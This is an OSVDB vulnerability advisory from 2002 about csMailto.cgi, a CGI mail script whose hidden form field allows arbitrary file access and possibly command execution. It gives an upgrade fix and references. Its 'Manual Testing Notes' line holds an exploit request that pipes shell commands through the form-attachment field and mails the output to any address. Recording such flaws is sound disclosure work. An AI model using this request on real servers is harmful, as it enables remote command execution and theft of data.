csMailto.cgi Arbitrary File Access

2002-04-23T00:00:00
ID OSVDB:6505
Type osvdb
Reporter Steve Gustin(stegus1@yahoo.com)
Modified 2002-04-23T00:00:00

Description

Vulnerability Description

csMailto.cgi contains a flaw that may allow a malicious user to access arbitrary files on the server. The issue is triggered when a hidden form field value is modified. It is possible that the flaw may allow execution of arbitrary commands on the system resulting in a loss of confidentiality.

Solution Description

Upgrade to version 2.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

csMailto.cgi contains a flaw that may allow a malicious user to access arbitrary files on the server. The issue is triggered when a hidden form field value is modified. It is possible that the flaw may allow execution of arbitrary commands on the system resulting in a loss of confidentiality.

Manual Testing Notes

Execute command on server and mail output to anyone: CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&Email=user@host.com&form-autoresponse=YES&command=mailform

References:

Vendor URL: http://www.cgiscript.net/ Vendor URL: http://www.cgiscript.net Vendor Specific Advisory URL Snort Signature ID: 2194 Related OSVDB ID: 6504 Related OSVDB ID: 6506 Related OSVDB ID: 6507 Nessus Plugin ID:11748 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2002-04/0326.html Keyword: form-attachment ISS X-Force ID: 9804 CVE-2002-0750